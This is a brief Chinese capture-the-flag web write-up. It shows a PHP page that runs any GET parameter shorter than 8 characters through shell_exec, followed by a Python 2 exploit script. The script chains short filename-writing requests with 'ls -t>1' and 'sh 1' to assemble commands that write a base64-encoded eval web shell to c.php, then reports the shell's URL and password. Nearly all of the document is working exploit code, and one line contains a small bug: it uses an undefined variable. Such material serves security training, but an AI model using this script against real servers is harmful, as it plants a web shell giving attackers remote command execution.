CTF_web
源码如下 :
<?php
if(strlen($_GET[1])<8){
echo shell_exec($_GET[1]);
}
?>
分析
这个challenge如果要写入一个 shell 的话
必须要要求当前目录有写权限
下面给出利用脚本
利用代码 :
#!/usr/bin/env python
# encoding: utf-8
import requests
import base64
url = "http://127.0.0.1/CTF_web/exec/exec3.php"
arg = "c"
def add_slashes(cmd):
cmd = cmd.replace(".", "\\.")
cmd = cmd.replace("\\", "\\\\")
cmd = cmd.replace("/", "\\/")
cmd = cmd.replace("|", "\\|")
cmd = cmd.replace("&", "\\&")
cmd = cmd.replace("-", "\\-")
cmd = cmd.replace("<", "\\<")
cmd = cmd.replace(">", "\\>")
cmd = cmd.replace("#", "\\#")
cmd = cmd.replace(" ", "\\ ")
cmd = cmd.replace("=", "\\=")
return cmd
def exec_cmd(cmd, max_length):
print "[+] cmd : %s" % (cmd)
cmd = add_slashes(cmd)
print "[+] Full cmd : %s" % (cmd)
if len(cmd) < max_length:
return requests.get(url + "?" + c + "=" + cmd).text[:-1135 - 57]
every_length = max_length - len(">") - len("\\\\")
times = len(cmd) / every_length
for i in range(1, times + 1, 1):
index = i * every_length - 1
if cmd[index] == "\\":
cmd = cmd[0:index] + "\\" + cmd[index:]
cmds = []
for i in xrange(times):
every = cmd[every_length * i:every_length * (i+1)]
true_cmd = ">%s\\\\" % (every)
cmds.append(true_cmd.replace("\\\\\\", "\\\\"))
end_cmd = ">%s" % (cmd[times * every_length:])
if len(end_cmd) == 1:
cmds[-1] = cmds[-1][0:-2]
cmds.append(end_cmd)
for i in cmds[::-1]:
target = url + "?" + arg + "=" + i
print "[+] Sending : %s" % (target)
requests.get(target)
requests.get(url + "?" + arg + "=" + "ls -t>1")
requests.get(url + "?" + arg + "=" + "sh 1")
exec_cmd("echo %s>6" % (base64.b64encode("<?php eval($_GET[c]);?>")), 7)
exec_cmd("cat 6|base64 -d>c.php", 7)
print "[%s]" % ("-" * 64)
print "[+] Upload webshell successful!"
print "[+] Webshell is stored at : %s" % (url + "c.php")
print "[+] password : c"
print "[%s]" % ("-" * 64)
